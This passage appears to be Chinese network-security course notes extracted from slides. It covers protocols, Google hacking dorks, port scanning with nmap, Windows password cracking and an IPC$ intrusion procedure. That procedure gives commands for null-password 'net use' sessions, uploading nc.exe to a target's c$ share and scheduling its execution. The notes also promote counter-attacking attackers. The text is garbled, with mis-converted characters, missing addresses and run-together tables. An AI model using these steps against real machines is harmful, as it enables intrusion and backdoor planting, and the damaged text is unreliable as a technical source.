電子取證：綜合利用以上信息，根據(jù)獲得的網(wǎng)絡(luò)攻擊者的詳細(xì)信息進(jìn)行電子取證，為法律起訴和網(wǎng)絡(luò)反向攻擊提供法律憑證。Step5：遭受到網(wǎng)絡(luò)攻擊后，除了及時(shí)的阻止網(wǎng)絡(luò)攻擊外，還要及時(shí)地恢復(fù)遭到破壞的本地系統(tǒng)，并及時(shí)地對(duì)外提供正常的效勞。Step6：網(wǎng)絡(luò)還擊是防護(hù)流程的最后一步，也是重要的一步。根據(jù)獲得的網(wǎng)絡(luò)攻擊者的詳細(xì)信息，網(wǎng)絡(luò)還擊綜合運(yùn)用探測(cè)類、阻塞類、漏洞類、控制類、欺騙類和病毒類攻擊手段進(jìn)行還擊。網(wǎng)絡(luò)主動(dòng)防御系統(tǒng)體系結(jié)構(gòu)網(wǎng)絡(luò)主動(dòng)防御平安模型＋縱深防御策略技術(shù)層面預(yù)警 預(yù)警是對(duì)可能發(fā)生的網(wǎng)絡(luò)攻擊給出預(yù)先的警告。包括幾方面：漏洞預(yù)警：根據(jù)的系統(tǒng)漏洞或研究發(fā)現(xiàn)的系統(tǒng)漏洞來(lái)對(duì)可能發(fā)生的網(wǎng)絡(luò)攻擊提出預(yù)警。行為預(yù)警：分析網(wǎng)絡(luò)黑客的各種行為來(lái)發(fā)現(xiàn)其可能要進(jìn)行的網(wǎng)絡(luò)攻擊。攻擊趨勢(shì)預(yù)警：分析已發(fā)生或正在發(fā)生的網(wǎng)絡(luò)攻擊來(lái)判斷可能的網(wǎng)絡(luò)攻擊。情報(bào)收集分析預(yù)警：綜合分析通過(guò)各種途徑收集來(lái)的情報(bào)判斷是否有發(fā)生網(wǎng)絡(luò)攻擊的可能性。保護(hù) 保護(hù)就是采用一切的手段保護(hù)我們信息系統(tǒng)的可用性、完整性、機(jī)密性、可用性、可控性和不可否認(rèn)性。這里的手段一般指靜態(tài)的防護(hù)手段，包括：防火墻、防病毒、虛擬專用網(wǎng)、操作系統(tǒng)平安增強(qiáng)等。檢測(cè) 檢測(cè)是非常重要的一個(gè)環(huán)節(jié)，檢測(cè)的目的是發(fā)現(xiàn)網(wǎng)絡(luò)攻擊，檢測(cè)本地網(wǎng)絡(luò)存在的非法信息流，以及檢測(cè)本地網(wǎng)絡(luò)存在的平安漏洞，從而有效地組織網(wǎng)絡(luò)攻擊。主要用到的技術(shù)有入侵檢測(cè)技術(shù)、網(wǎng)絡(luò)實(shí)時(shí)監(jiān)控技術(shù)和網(wǎng)絡(luò)平安掃描技術(shù)等。響應(yīng) 響應(yīng)就是對(duì)危及網(wǎng)絡(luò)平安的時(shí)間和行為做出反響，阻止對(duì)信息系統(tǒng)的進(jìn)一步破壞并使損失降到最低。要求在檢測(cè)到網(wǎng)絡(luò)攻擊后及時(shí)地阻斷網(wǎng)絡(luò)攻擊，或者將網(wǎng)絡(luò)攻擊引誘到其它的主機(jī)上，使網(wǎng)絡(luò)攻擊不能對(duì)信息系統(tǒng)造成進(jìn)一步的破壞。另外還要定位網(wǎng)絡(luò)攻擊源，并進(jìn)行網(wǎng)絡(luò)攻擊取證，為訴諸法律和網(wǎng)絡(luò)還擊做準(zhǔn)備?；謴?fù) 及時(shí)地恢復(fù)系統(tǒng)，使系統(tǒng)能盡快正常地對(duì)外提供效勞，是降低網(wǎng)絡(luò)攻擊造成損失的有效途徑。為了能保證收到攻擊后能及時(shí)成功地恢復(fù)系統(tǒng)，必須在平時(shí)做好備份工作。主要包括對(duì)數(shù)據(jù)的備份，以及對(duì)系統(tǒng)的備份。備份技術(shù)分為三種：現(xiàn)場(chǎng)內(nèi)備份、現(xiàn)場(chǎng)外備份和冷熱備份。還擊 還擊是對(duì)網(wǎng)絡(luò)攻擊者進(jìn)行反向的攻擊。也就是運(yùn)用各種網(wǎng)絡(luò)攻擊手段對(duì)網(wǎng)絡(luò)攻擊者進(jìn)行攻擊，迫使其停止攻擊。網(wǎng)絡(luò)平安通信協(xié)議 要構(gòu)建一個(gè)縱深的網(wǎng)絡(luò)防御體系，各種技術(shù)所構(gòu)成的子系統(tǒng)建的信息交互是不可防止的。網(wǎng)絡(luò)通信協(xié)議是保證各個(gè)子系統(tǒng)通信平安的基石。3.網(wǎng)絡(luò)協(xié)議

3.1TCP/IP體系結(jié)構(gòu)

3.2IP協(xié)議3.3TCP協(xié)議

3.4UDP協(xié)議

3.5ARP協(xié)議和RARP協(xié)議

IPMACMACIP3.6ICMP協(xié)議

Internet控制報(bào)文協(xié)議〔ICMP〕允許主機(jī)或路由器報(bào)告過(guò)失情況和提供有關(guān)異常情況的報(bào)告。

消息類型描述目標(biāo)不可達(dá)（Destinationunreachable）分組不能傳送到目的端超時(shí)（Timeexceeded）分組中Time_to_live字段已經(jīng)為0參數(shù)有問(wèn)題（Parameterproblem）分組中頭部包含無(wú)效的字段源端發(fā)送速度降低（Sourcequench）命令源端降低發(fā)送分組的速度重新定向（Redirect）路由器告訴源主機(jī)其分組的路由有誤問(wèn)訊請(qǐng)求（Echorequest）詢問(wèn)目的主機(jī)是否是活性或可達(dá)的問(wèn)訊回答（Echoreply）被詢問(wèn)的主機(jī)是否活動(dòng)或可達(dá)的時(shí)間戳請(qǐng)求（Timestamprequest）與問(wèn)訊請(qǐng)求一樣，只是附帶上時(shí)間戳?xí)r間戳回答（Timestampreply）與問(wèn)訊回答一樣，只是附帶上時(shí)間戳3.7DNS協(xié)議

DNS通過(guò)一個(gè)名為“解析〞的過(guò)程將域名轉(zhuǎn)換為IP地址，或?qū)P地址轉(zhuǎn)換為域名。DNS使用查找表格來(lái)將二者的值關(guān)聯(lián)起來(lái)。3.8SMTP協(xié)議和POP3協(xié)議

SMTP協(xié)議簡(jiǎn)單郵件傳輸協(xié)議(SimpleMailTransferProtocol，SMTP)是為網(wǎng)絡(luò)系統(tǒng)間的電子郵件交換而設(shè)計(jì)的。UNIX、MVS、VMS、基于Windows的操作系統(tǒng)以及基于NovellNetWare的操作系統(tǒng)都可以通過(guò)SMTP來(lái)在TCP/IP上交換電子郵件。通過(guò)SMTP發(fā)送的消息由兩局部組成：地址頭和消息文本。POP3協(xié)議POP協(xié)議允許工作站動(dòng)態(tài)訪問(wèn)郵件效勞器上的郵件，目前已開(kāi)展到第三版，稱為POP3。POP3允許工作站檢索郵件效勞器上的郵件。POP3傳輸過(guò)程發(fā)生在站與站之間，其中傳輸?shù)南⒖梢允侵噶睿部梢允菓?yīng)答。POP協(xié)議支持“離線〞郵件處理。其具體過(guò)程是：郵件發(fā)送到效勞器上，電子郵件客戶端調(diào)用郵件客戶機(jī)程序以連接效勞器，并下載電子郵件的電子協(xié)議。這種離線訪問(wèn)模式基于存儲(chǔ)并轉(zhuǎn)發(fā)效勞，將郵件從郵件效勞器端送到個(gè)人終端機(jī)器上，一般是PC機(jī)或Mac。一旦郵件發(fā)送到PC機(jī)或Mac上，郵件效勞器上的郵件將會(huì)被刪除。POP3并不支持效勞器郵件的擴(kuò)展操作，此過(guò)程由更高級(jí)綜合的IMAP4〔因特網(wǎng)消息訪問(wèn)協(xié)議〕完成。作為傳輸協(xié)議的POP3使用TCP的110端口。POP3是發(fā)送在客戶機(jī)和效勞器間的ASCII信息。POP3命令摘要如表所示。命令描述USER用戶名PASS用戶密碼STAT服務(wù)器信息RETR獲取的信息序號(hào)DELE刪除的信息序號(hào)LISTTOP<messageID><nombredelignes>從頭開(kāi)始（包含協(xié)議頭）打印X行信息QUIT退出POP3服務(wù)器POP3命令摘要第二章信息收集1概述

概念 信息收集是指通過(guò)各種方式獲取所需要的信息。信息收集是信息得以利用的第一步，也是關(guān)鍵的一步。信息收集工作的好壞，直接關(guān)系到入侵與防御的成功與否。為了保證信息收集的質(zhì)量，應(yīng)堅(jiān)持以下原那么： 〔1〕準(zhǔn)確性原那么 該原那么要求所收集到的信息要真實(shí)，可靠。這是最根本的要求。 〔2〕全面性原那么 該原那么要求所搜集到的信息要廣泛，全面完整。 〔3〕時(shí)效性原那么 信息的利用價(jià)值取決于該信息是否能及時(shí)地提供，即它的時(shí)效性。信息只有及時(shí)、迅速地提供給它的使用者才能有效地發(fā)揮作用。2.信息收集技術(shù)信息收集—非技術(shù)手段合法途徑從目標(biāo)機(jī)構(gòu)的網(wǎng)站獲取新聞報(bào)道，出版物新聞組或論壇社會(huì)工程手段假冒他人，獲取第三方的信任搜索引擎2.1搜索引擎

搜索引擎是自動(dòng)從因特網(wǎng)收集信息，經(jīng)過(guò)一定整理以后，提供給用戶進(jìn)行查詢的系統(tǒng)。它包括信息搜集、信息整理和用戶查詢?nèi)植俊oogleHackingintext: 將網(wǎng)頁(yè)中正文中的字符作為搜索條件，例如：輸入“intext:平安〞，將搜索出正文里包含“平安〞關(guān)鍵字的網(wǎng)頁(yè)。allintext: 與intext類似。intitle: 在網(wǎng)頁(yè)標(biāo)題中搜索包含關(guān)鍵字的網(wǎng)頁(yè)，例如：輸入“intitle:管理〞，即可找出網(wǎng)頁(yè)標(biāo)題中包含“管理〞的網(wǎng)頁(yè)。allintitle: 與intitle類似。cache: 在google的緩存里搜索，這里可能會(huì)找到很多很有用的東西哦，雖然此刻網(wǎng)頁(yè)已經(jīng)刪除，但google效勞器里還保存有。define: 查找詞語(yǔ)的定義，例如：輸入“definehacker〞，即可找到“hacker〞的相關(guān)定義。filetype: 查找指定類型的網(wǎng)頁(yè)，這個(gè)關(guān)鍵字非常有用，例如：輸入“filetype:bak〞即可找出文件類型為bak的文件〔該文件很可能由各種編輯器自動(dòng)備份產(chǎn)生，有可能找到網(wǎng)站的源碼〕；又如，通常黑客會(huì)嘗試下載網(wǎng)站的數(shù)據(jù)庫(kù)文件〔*.mdb〕，即可用“filetype:mdb〞來(lái)搜索，找到數(shù)據(jù)庫(kù)文件后直接下載，或許就能得到網(wǎng)站的權(quán)限。info: 查找指定站點(diǎn)的根本信息。inurl: 查找在url中包含搜索詞的網(wǎng)頁(yè)，例如：黑客慣用的“inurl:admin〞偶爾就能搜索出網(wǎng)站的登錄頁(yè)面，從而進(jìn)行下一步的攻擊。link: 搜索與某網(wǎng)站做了鏈接的網(wǎng)頁(yè)，例如：輸入“〞即可搜索出包含有鏈接到“〞的網(wǎng)頁(yè)〔這個(gè)可以用來(lái)找出有多少網(wǎng)頁(yè)在鏈接你的網(wǎng)站哦〕。site: 用于搜索某一域內(nèi)的網(wǎng)頁(yè)，例如：輸入“site:sohu〞，即可實(shí)現(xiàn)在“sohu〞域內(nèi)搜索的目的。還有一些符號(hào)在搜索中也是很有用的：+必須包含有的搜索詞；-不能包含的搜索詞；~搜索同意詞；.單一通配符；*通配符，可匹配多個(gè)字符；“〞精確的查詢。2.2域搜索

概念：域搜索是在指定的一個(gè)網(wǎng)域內(nèi)進(jìn)行信息搜索。舉例1： 首先翻開(kāi)，然后輸入“allinurl:login〞； 我們選中其中的一個(gè)“://〞翻開(kāi)； 搜索此站“site:XXX〞的二級(jí)域名網(wǎng)站； 看一下有沒(méi)有pdf電子文檔，“site:XXXfiletype:pdf〞； 輸入“info:XXX〞，查到該網(wǎng)站的根本信息。舉例2：在Google的搜索關(guān)鍵字“intitle:〞WJ-NT104MainPage〞，即可找到很多網(wǎng)絡(luò)攝像頭。 如：2.3域名解析域名：為了方便記憶而專門建立的一套地址轉(zhuǎn)換系統(tǒng)。一個(gè)域名對(duì)應(yīng)一個(gè)IP地址，而多個(gè)域名可以同時(shí)被解析到一個(gè)IP地址。域名解析：域名到IP地址的轉(zhuǎn)換過(guò)程。域名解析效勞器：DNS—DomainNameSystem。2.3.1動(dòng)態(tài)域名解析代表商業(yè)性公司Yahoo代表公司名字www代表yahoo公司的一臺(tái)效勞器2.4路由跟蹤

概念 路由跟蹤就是從本地開(kāi)始到達(dá)某一目標(biāo)地址所經(jīng)過(guò)的路由設(shè)備，并顯示出這些路由設(shè)備的IP、連接時(shí)間等信息。作用：如果某段網(wǎng)絡(luò)不通或網(wǎng)速很慢，可以利用路由跟蹤找出某故障地點(diǎn)，方便維護(hù)人員的維護(hù)工作。對(duì)于“黑客〞來(lái)說(shuō)，這是個(gè)很有用的功能，他可以大概分析出你所在網(wǎng)絡(luò)的狀況。這對(duì)于第一步的周邊網(wǎng)絡(luò)環(huán)境信息收集很有用。tracert：用IP生存時(shí)間TTL字段和ICMP錯(cuò)誤消息來(lái)確定從一個(gè)主機(jī)到網(wǎng)絡(luò)上其他主機(jī)的路由。Ping、fping、pingsweepARP探測(cè)FingerWhoisDNS/nslookup搜索引擎〔google、百度〕telnet3.信息收集的工具軟件(技術(shù)手段)ping作用和特點(diǎn)用來(lái)判斷目標(biāo)是否活動(dòng)；最常用；最簡(jiǎn)單的探測(cè)手段；Ping程序一般是直接實(shí)現(xiàn)在系統(tǒng)內(nèi)核中的，而不是一個(gè)用戶進(jìn)程。原理Type=8Type=0ping類型為8，表示“回響請(qǐng)求〞類型為0，表示“回響應(yīng)答〞主機(jī)在線情況主機(jī)不應(yīng)答情況1〕主機(jī)不在線2〕防火墻阻斷ICMP探測(cè)ping表示機(jī)器不在線；或者防火墻阻斷。舉例1：Replyfrom0:bytes=32time<1msTTL=32Replyfrom0表示回應(yīng)ping的ip地址是。bytes=32表示回應(yīng)報(bào)文的大小，這里是32字節(jié)。time<1ms表示回應(yīng)所花費(fèi)的時(shí)間，小于1毫秒。TTL=32，TTL是生存時(shí)間，報(bào)文經(jīng)過(guò)一個(gè)路由器就減1，如果減到0就會(huì)被拋棄。這里是32。舉例2：Pingwar2.0——群ping.ARP探測(cè)

能探測(cè)同一局域網(wǎng)內(nèi)的主機(jī)，因?yàn)榉阑饓Σ荒茏钄郃RP請(qǐng)求。finger作用和特點(diǎn)UNIX系統(tǒng)中用于查詢用戶情況的程序網(wǎng)絡(luò)效勞效勞端口：tcp79效勞端程序fingerd,客戶端程序finger不需要認(rèn)證就提供用戶信息命令格式：finger[選項(xiàng)][使用者][用戶@主機(jī)]姓名

最后登錄時(shí)間fingerwhois作用和特點(diǎn)網(wǎng)絡(luò)效勞效勞端口：tcp43效勞端程序whoisd,客戶端程序finger提供目標(biāo)系統(tǒng)的地址信息參考網(wǎng)站1參考網(wǎng)站2:///常規(guī)信息收集網(wǎng)絡(luò)域名網(wǎng)絡(luò)Ip地址分配使用單位地址DNS作用和特點(diǎn)網(wǎng)絡(luò)效勞效勞端口：udp53效勞端程序bind,客戶端程序nslookup提供目標(biāo)系統(tǒng)域名與地址的轉(zhuǎn)換Nslookup兩種模式：交互式和非交互式。非交互式模式：Nslookup–DNS效勞器或IP地址Nslookup>?//查看helpNslookup通過(guò)nslookup獲得子域名setquerytype=anyxxx.xxx

#輸入域名后根據(jù)輸出內(nèi)容找到dns效勞器serverns1.xxx.xxx.xxx#連接DNS效勞器ls-dxxx.xxx第三章網(wǎng)絡(luò)掃描主機(jī)發(fā)現(xiàn)技術(shù)

主機(jī)發(fā)現(xiàn)技術(shù)主要分三種：ping掃描ARP掃描端口掃描1.Ping掃描確定哪些機(jī)器是up的2種方式ICMP類似于ping，發(fā)送icmp消息給目標(biāo)，看是否有返回TCPping給目標(biāo)特定的tcp端口(如常用的80)發(fā)送ack消息，如果返回rst，說(shuō)明機(jī)器up。常用的tracetcp。2.ARP掃描

ARP〔AddressResolutionProtocol〕即地址解析協(xié)議，它是用于局域網(wǎng)內(nèi)的物理地址。ARP掃描是指通過(guò)向目標(biāo)主機(jī)發(fā)送ARP請(qǐng)求〔查詢目標(biāo)主機(jī)的物理地址〕，如果目標(biāo)主機(jī)回應(yīng)一個(gè)ARP響應(yīng)報(bào)文，那么說(shuō)明它是存活的。下面是ARP掃描的示意圖：3.端口掃描3.1目的判斷目標(biāo)主機(jī)開(kāi)啟了哪些端口及其對(duì)應(yīng)的效勞確定目標(biāo)系統(tǒng)正在運(yùn)行的TCP/UDP效勞在掃描時(shí)希望隱藏自己3.2掃描根底TCP數(shù)據(jù)報(bào)首部標(biāo)志域TCP連接的建立過(guò)程TCP連接的釋放過(guò)程TCP/IP實(shí)現(xiàn)遵循的原那么TCP數(shù)據(jù)報(bào)首部標(biāo)志域(1)6個(gè)比特標(biāo)志位SYN用來(lái)建立連接，同步雙方的序列號(hào)。SYN=1&ACK=0,連接請(qǐng)求包SYN=1&ACK=1,接受請(qǐng)求FIN釋放連接包RST復(fù)位一個(gè)連接如果收到一個(gè)分段不屬于該主機(jī)的任何一個(gè)連接，發(fā)送RST包TCP數(shù)據(jù)報(bào)首部標(biāo)志域〔2〕URG緊急數(shù)據(jù)。表示數(shù)據(jù)包中包含緊急數(shù)據(jù)。ACK確認(rèn)標(biāo)志位。表示數(shù)據(jù)包中確實(shí)認(rèn)號(hào)有效。PSHPUSH，如果為1，接受端應(yīng)盡快把數(shù)據(jù)傳送給應(yīng)用層。TCP可靠性通過(guò)校驗(yàn)和、定時(shí)器、數(shù)據(jù)序號(hào)、應(yīng)答號(hào)來(lái)實(shí)現(xiàn)數(shù)據(jù)的可靠傳輸TCP中的序列號(hào)為每個(gè)發(fā)送的字節(jié)分配一個(gè)序號(hào)，用來(lái)保證數(shù)據(jù)的順序，剔除重復(fù)的數(shù)據(jù)一個(gè)TCP連接包含兩個(gè)流〔分別代表每個(gè)方向的數(shù)據(jù)〕建立連接時(shí)流的發(fā)送方選擇一個(gè)初始序號(hào)ISN(initialsequencenumber)ISN必須隨機(jī)選取才平安TCP連接的建立過(guò)程TCP連接的釋放過(guò)程1CSSYNSEQ=104ACK=02SCSYNACKSEQ=319ACK=1053CSACKSEQ=105ACK=3204SCPSHACKSEQ=320ACK=105Data15bytes5CSPSHACKSEQ=105ACK=335Data15bytes6SCACKSEQ=335ACK=120Data15bytesTCP/IP實(shí)現(xiàn)遵循的原那么原那么1：當(dāng)一個(gè)SYN或者FIN數(shù)據(jù)包到達(dá)一個(gè)關(guān)閉了的端口，效勞器丟棄該數(shù)據(jù)包，并返回一個(gè)RST數(shù)據(jù)包；TCP/IP實(shí)現(xiàn)遵循的原那么原那么2：當(dāng)一個(gè)RST數(shù)據(jù)包到達(dá)一個(gè)監(jiān)聽(tīng)端口或者關(guān)閉的端口，RST數(shù)據(jù)包都會(huì)被效勞器丟棄。TCP/IP實(shí)現(xiàn)遵循的原那么原那么3：當(dāng)一個(gè)ACK數(shù)據(jù)包到達(dá)一個(gè)監(jiān)聽(tīng)的端口，效勞器會(huì)丟棄這個(gè)數(shù)據(jù)包，并回應(yīng)一個(gè)RST數(shù)據(jù)包。TCP/IP實(shí)現(xiàn)遵循的原那么原那么4：當(dāng)一個(gè)FIN數(shù)據(jù)包到達(dá)一個(gè)監(jiān)聽(tīng)端口時(shí)，數(shù)據(jù)包將會(huì)被丟棄。3.3端口掃描分類技術(shù)

端口掃描分類掃描技術(shù)分析掃描分類TCP全連接開(kāi)放掃描半開(kāi)放掃描TCP反向ident掃描IP頭信息dumb掃描SYN掃描FIN掃描隱蔽掃描TCP分段ACK掃描XMAS掃描空掃描掃射掃描SYN/ACK掃描ping掃射其它掃描UDP/ICMP不可達(dá)FTP彈跳UDP掃射UDPrecvfrom/write掃描ACK掃射SYN掃射ICMP掃射掃描技術(shù)分析常規(guī)掃描技術(shù)調(diào)用connect函數(shù)直接連接被掃描端口無(wú)須任何特殊權(quán)限速度較慢，易被記錄高級(jí)掃描技術(shù)利用探測(cè)數(shù)據(jù)包的返回信息〔例如RST〕來(lái)進(jìn)行間接掃描較為隱蔽，不易被日志記錄或防火墻發(fā)現(xiàn)完全連接掃描(TCPconnect掃描)ClientSYNServerSYN/ACKClientACKClientSYNServerRST/ACKClientRST端口開(kāi)放端口關(guān)閉TCPconnect掃描直接用connect連接對(duì)方的端口連接成功，說(shuō)明對(duì)方端口是開(kāi)放的優(yōu)點(diǎn)簡(jiǎn)單，不需要特權(quán)用戶缺點(diǎn)容易被覺(jué)察在應(yīng)用日志中會(huì)有記錄下來(lái)一些沒(méi)有任何動(dòng)作的連接被掃描主機(jī)開(kāi)放的端口不提供效勞的端口防火墻過(guò)濾的端口

掃描器SYNSYNSYNSYN+ACK握手RST重置沒(méi)有回應(yīng)或者其他利用TCP三次握手的第一次進(jìn)行掃描。半連接SYN掃描(TCPSYN掃描)TCPSYN掃描Halfopenscan在3次握手完成前終止連接方法發(fā)SYN如果收到RST，說(shuō)明端口關(guān)閉如果收到SYNACK，說(shuō)明端口開(kāi)放，發(fā)送RST優(yōu)點(diǎn)應(yīng)用程序日志沒(méi)有記錄缺點(diǎn)復(fù)雜，需要自己構(gòu)造數(shù)據(jù)包很多系統(tǒng)要超級(jí)用戶才能進(jìn)行容易被發(fā)現(xiàn)ClientACKServerRSTClientACKServer--端口開(kāi)放端口關(guān)閉隱蔽掃描：ACK隱蔽掃描：FINClientFINServerRSTClientFINServer--未監(jiān)聽(tīng)端口在監(jiān)聽(tīng)端口3.4端口掃描工具NmapXscanSuperScanShadowSecurityScannerMS06040ScannerNmap——探測(cè)工具王功能 NMAP是探測(cè)網(wǎng)絡(luò)主機(jī)和開(kāi)放效勞的佼佼者。是Linux下使用者的最愛(ài)，現(xiàn)在已經(jīng)有Windows的版本。NMAP支持多種協(xié)議的掃描如UDP，TCPconnect,TCPSYN,ftpproxy(bounceattack),Reverse-ident,ICMP(pingsweep),FIN,ACKsweep,XmasTree,SYNsweep,和Null掃描。還提供一些實(shí)用功能，比方通過(guò)tcp/ip來(lái)甄別操作系統(tǒng)類型；秘密掃描、動(dòng)態(tài)延遲和重發(fā)；欺騙掃描、端口過(guò)濾探測(cè)、分布掃描等。-sTTCPConnect()掃描 這是對(duì)TCP的最根本形式的偵測(cè)。對(duì)目標(biāo)主機(jī)端口進(jìn)行試探，如果該端口開(kāi)放，那么連接成功，否那么代表這個(gè)端口沒(méi)有開(kāi)放。-sSTCPSYN掃描 就是我們介紹的‘半開(kāi)’式的掃描，速度會(huì)比connect掃描快。-sF-sX–sN StealthFIN,XmasTree或者Null掃描模式。-sPPing掃描 對(duì)指定的IP發(fā)送ICMP，如果對(duì)方屏蔽了echorequest，nmap還能發(fā)送一個(gè)TCPack包到80端口探測(cè)。-sUUDP掃描 確定某個(gè)UDP端口是否翻開(kāi)。xscan選擇‘無(wú)條件掃描’，才可以突破防火墻屏蔽ping，進(jìn)行端口掃描。Superscan——速度之王

MS06040Scanner——專用的漏洞掃描器用于檢測(cè)目標(biāo)系統(tǒng)是否存在MS06040漏洞。MS06040Scanner的工作原理是首先是通過(guò)端口掃描和操作系統(tǒng)掃描獲取操作系統(tǒng)類型和開(kāi)放的端口，如果是windows2000系統(tǒng)，開(kāi)放了TCP139或者TCP445端口，并且返回的數(shù)據(jù)包跟漏洞庫(kù)里的定義相匹配，那么說(shuō)明該主機(jī)可能可能存在MS06040漏洞，我們就可以使用MS06040漏洞利用程序?qū)ζ溥M(jìn)行遠(yuǎn)程溢出攻擊。4.推薦平安站點(diǎn)平安焦點(diǎn)綠盟科技浪客聯(lián)盟紅客聯(lián)盟劍鷹網(wǎng)絡(luò)平安小組中國(guó)X黑客小組中華網(wǎng)絡(luò)平安聯(lián)盟中國(guó)黑客入侵組中國(guó)黑客聯(lián)盟黑客基地黑客防線第四章基于windows操作系統(tǒng)的攻擊與防御1.windows系統(tǒng)口令攻擊

口令攻擊主要采用以下幾種方法：猜測(cè)攻擊字典攻擊窮舉攻擊混合攻擊直接破解系統(tǒng)口令文件網(wǎng)絡(luò)嗅探(sniffer)鍵盤記錄中間人攻擊社會(huì)工程學(xué)1.1Windows操作系統(tǒng)的口令破解技術(shù)

1.輸入法漏洞

windows2000sp2之前的版本。 目前的Vista操作系統(tǒng)，極點(diǎn)五筆輸入法，也存在此類問(wèn)題。2.暴力破解SAM文件，一般使用工具LC3.刪除SAM文件1.2設(shè)置系統(tǒng)策略保護(hù)口令連接策略問(wèn)題：默認(rèn)情況下系統(tǒng)沒(méi)有設(shè)置登錄的失敗次數(shù)限制，導(dǎo)致可以被無(wú)限制地嘗試連接系統(tǒng)管理的共享資源。解決方法：設(shè)置用戶的訪問(wèn)策略，定義用戶登錄失敗到達(dá)一定次數(shù)時(shí)鎖定帳號(hào)，并限制管理員遠(yuǎn)程訪問(wèn)。如何實(shí)現(xiàn)？在“管理工具〞中，選擇本地平安策略。在本地平安策略中選擇“帳戶平安策略〞，其中的“密碼策略〞可以對(duì)密碼的長(zhǎng)度、密碼的存留時(shí)間等方面進(jìn)行設(shè)置。比方：在“密碼必須符合復(fù)雜性要求〞的選項(xiàng)中，系統(tǒng)默認(rèn)是停用該功能，但推薦用戶在使用時(shí)將該功能開(kāi)啟。點(diǎn)擊“帳戶鎖定策略〞，可以看到三個(gè)被選項(xiàng)，這里可以對(duì)帳戶的時(shí)間和帳戶無(wú)效訪問(wèn)的次數(shù)進(jìn)行設(shè)置。此處，我們點(diǎn)擊“用戶鎖定閾值〞點(diǎn)右鍵，選擇“平安性〞，此處就可以對(duì)用戶無(wú)效訪問(wèn)次數(shù)進(jìn)行限制。由于Administrator帳號(hào)的特殊性，Administrator帳號(hào)無(wú)法設(shè)置帳號(hào)鎖定，即使登錄失敗的次數(shù)到達(dá)設(shè)置時(shí)，該帳號(hào)也不可能被鎖住。因此除了系統(tǒng)默認(rèn)創(chuàng)立的Administrator帳號(hào)，還應(yīng)該創(chuàng)立至少一個(gè)具有管理員特權(quán)的帳號(hào)，并且，把默認(rèn)帳號(hào)Administrator改成另外一個(gè)名字。2.IPC$入侵

2.1什么是IPC IPC是英文InternetProcessConnection的縮寫，即：命名管道，它是windows提供的一個(gè)通信根底，用來(lái)在兩臺(tái)計(jì)算機(jī)進(jìn)程之間建立通信連接，而IPC后面的$是windows系統(tǒng)所使用的隱藏符號(hào)，因此IPC$表示IPC共享，但是是隱藏的共享。默認(rèn)IPC是共享的。通過(guò)IPC連接，入侵者就能夠?qū)崿F(xiàn)遠(yuǎn)程控制目標(biāo)主機(jī)。根底知識(shí)SMB:(ServerMessageBlock)Windows協(xié)議族，用于文件打印共享的效勞；NBT:(NETBiosOverTCP/IP)使用137〔UDP〕138〔UDP〕139〔TCP〕端口實(shí)現(xiàn)基于TCP/IP協(xié)議的NETBIOS網(wǎng)絡(luò)互聯(lián)。在WindowsNT中SMB基于NBT實(shí)現(xiàn)，即使用139〔TCP〕端口；而在Windows2000中，SMB除了基于NBT實(shí)現(xiàn)，還可以直接通過(guò)445端口實(shí)現(xiàn)。網(wǎng)絡(luò)共享對(duì)于端口的選擇對(duì)于win2000客戶端〔發(fā)起端〕來(lái)說(shuō)：1如果在允許NBT的情況下連接效勞器時(shí)，客戶端會(huì)同時(shí)嘗試訪問(wèn)139和445端口，如果445端口有響應(yīng)，那么就發(fā)送RST包給139端口斷開(kāi)連接，用455端口進(jìn)行會(huì)話，當(dāng)445端口無(wú)響應(yīng)時(shí)，才使用139端口，如果兩個(gè)端口都沒(méi)有響應(yīng)，那么會(huì)話失敗；2如果在禁止NBT的情況下連接效勞器時(shí)，那么客戶端只會(huì)嘗試訪問(wèn)445端口，如果445端口無(wú)響應(yīng)，那么會(huì)話失敗。對(duì)于win2000效勞器端來(lái)說(shuō)：1如果允許NBT,那么UDP端口137,138,TCP端口139,445將開(kāi)放〔LISTENING〕；2如果禁止NBT，那么只有445端口開(kāi)放。我們建立的ipc$會(huì)話對(duì)端口的選擇同樣遵守以上原那么。顯而易見(jiàn)，如果遠(yuǎn)程效勞器沒(méi)有監(jiān)聽(tīng)139或445端口，ipc$會(huì)話是無(wú)法建立的。2.2空會(huì)話〔NullSession〕攻擊概念：Null會(huì)話是同效勞器建立的無(wú)信任支持的會(huì)話。一個(gè)會(huì)話包含用戶的認(rèn)證信息，而Null會(huì)話是沒(méi)有用戶的認(rèn)證信息，也就好比是一個(gè)匿名的一樣。作用：當(dāng)在多域環(huán)境中，要在多域中建立信任關(guān)系，首先需要找到域中的pdc來(lái)通過(guò)平安通道的密碼驗(yàn)證，使用空會(huì)話能夠非常容易地找到pdc，還有就是關(guān)于一些系統(tǒng)效勞的問(wèn)題。而且Lmhosts的#include就需要空會(huì)話的支持。攻擊過(guò)程：1).用掃描軟件搜尋存在弱口令的主機(jī)比方流光，SSS，X-scan等，然后鎖定目標(biāo)，如果掃到了管理員權(quán)限的口令，假設(shè)現(xiàn)在得到了administrator的密碼為空2).然后，我們先建立起ipc$連接

netuse\\\ipc$""/user:administrator3).查看遠(yuǎn)程主機(jī)開(kāi)了什么共享

netview

注釋：聲明用netview命令無(wú)法看到默認(rèn)共享，因此通過(guò)上面返回的結(jié)果，并不能判斷對(duì)方是否開(kāi)啟了默認(rèn)共享。4).查看遠(yuǎn)程主機(jī)的時(shí)間

nettime

5).得到遠(yuǎn)程主機(jī)的netbios用戶名列表nbtstat

Copye:\nc.exe\\5\c$上傳文件nc.exe到目標(biāo)地址的c盤At14:03c:\nc.exe指定在目標(biāo)地址上在14:03執(zhí)行程序nc.exe以下是一些常見(jiàn)的導(dǎo)致ipc$連接失敗的原因：1IPC連接是WindowsNT及以上系統(tǒng)中特有的功能，由于其需要用到WindowsNT中很多DLL函數(shù)，所以不能在Windows9.x/Me系統(tǒng)中運(yùn)行，也就是說(shuō)只有nt/2000/xp才可以相互建立ipc$連接，98/me是不能建立ipc$連接的；2如果想成功的建立一個(gè)ipc$連接，就需要對(duì)方開(kāi)啟ipc$共享，即使是空連接也是這樣，如果對(duì)方關(guān)閉了ipc$共享，你將會(huì)建立失敗；3你未啟動(dòng)Lanmanworkstation效勞，它提供網(wǎng)絡(luò)鏈結(jié)和通訊，沒(méi)有它你無(wú)法發(fā)起連接請(qǐng)求〔顯示名為：Workstation〕；4對(duì)方未啟動(dòng)Lanmanserver效勞，它提供了RPC支持、文件、打印以及命名管道共享，ipc$依賴于此效勞，沒(méi)有它遠(yuǎn)程主機(jī)將無(wú)法響應(yīng)你的連接請(qǐng)求〔顯示名為：Serv